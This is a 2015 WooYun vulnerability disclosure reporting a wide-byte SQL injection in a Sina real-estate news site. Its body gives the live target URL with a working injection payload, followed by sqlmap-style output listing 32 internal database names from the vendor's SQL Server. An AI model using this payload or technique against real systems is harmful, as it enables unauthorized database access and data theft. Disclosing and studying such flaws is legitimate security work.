当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138411

漏洞标题:新浪房产存在SQL宽字节注入漏洞

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2015-09-01 17:43

修复时间:2015-10-17 10:18

公开时间:2015-10-17 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-02: 厂商已经确认,细节仅向厂商公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

新浪房产SQL注入

详细说明:

http://haiwai.house.sina.com.cn/news/list?ca=00
http://haiwai.house.sina.com.cn/news/list?ca=-9%df' OR 3151=3151 and '='='=

漏洞证明:

[17:31:48] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[17:31:48] [INFO] fetching database names
[17:31:48] [INFO] the SQL query used returns 32 entries
[17:31:48] [INFO] retrieved: Commercial
[17:31:48] [INFO] retrieved: Commercial_Agent
[17:31:49] [INFO] retrieved: Commercial_CMS
[17:31:49] [INFO] retrieved: Commercial_CRM3
[17:31:49] [INFO] retrieved: Commercial_DB
[17:31:49] [INFO] retrieved: Commercial_News
[17:31:49] [INFO] retrieved: Commercial_Rent
[17:31:49] [INFO] retrieved: CommercialCMS_DB
[17:31:49] [INFO] retrieved: CRIC_Deployment
[17:31:50] [INFO] retrieved: CRIC_Travel_ReceiveData
[17:31:50] [INFO] retrieved: CRIC_Travel_Web
[17:31:50] [INFO] retrieved: CRIC_Travel_Web_temp
[17:31:50] [INFO] retrieved: dbcheck
[17:31:50] [INFO] retrieved: DiChanRen
[17:31:50] [INFO] retrieved: DiChanRen_CMS
[17:31:50] [INFO] retrieved: DuanZu
[17:31:51] [INFO] retrieved: etoon_877
[17:31:51] [INFO] retrieved: master
[17:31:51] [INFO] retrieved: model
[17:31:51] [INFO] retrieved: msdb
[17:31:51] [INFO] retrieved: Overseas
[17:31:51] [INFO] retrieved: OverseasCMS
[17:31:52] [INFO] retrieved: OverseasCRM
[17:31:52] [INFO] retrieved: Phenix
[17:31:52] [INFO] retrieved: ReportServer
[17:31:52] [INFO] retrieved: ReportServerTempDB
[17:31:52] [INFO] retrieved: sh_XiaZai
[17:31:53] [INFO] retrieved: Shanglv_CMS
[17:31:53] [INFO] retrieved: tempdb
[17:31:53] [INFO] retrieved: Travel_CMS
[17:31:53] [INFO] retrieved: Travel_ESaleMS
[17:31:53] [INFO] retrieved: Travel_News
available databases [32]:
[*] Commercial
[*] Commercial_Agent
[*] Commercial_CMS
[*] Commercial_CRM3
[*] Commercial_DB
[*] Commercial_News
[*] Commercial_Rent
[*] CommercialCMS_DB
[*] CRIC_Deployment
[*] CRIC_Travel_ReceiveData
[*] CRIC_Travel_Web
[*] CRIC_Travel_Web_temp
[*] dbcheck
[*] DiChanRen
[*] DiChanRen_CMS
[*] DuanZu
[*] etoon_877
[*] master
[*] model
[*] msdb
[*] Overseas
[*] OverseasCMS
[*] OverseasCRM
[*] Phenix
[*] ReportServer
[*] ReportServerTempDB
[*] sh_XiaZai
[*] Shanglv_CMS
[*] tempdb
[*] Travel_CMS
[*] Travel_ESaleMS
[*] Travel_News

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-09-02 10:16

厂商回复:

感谢支持,已经转交给合作方处理

最新状态:

暂无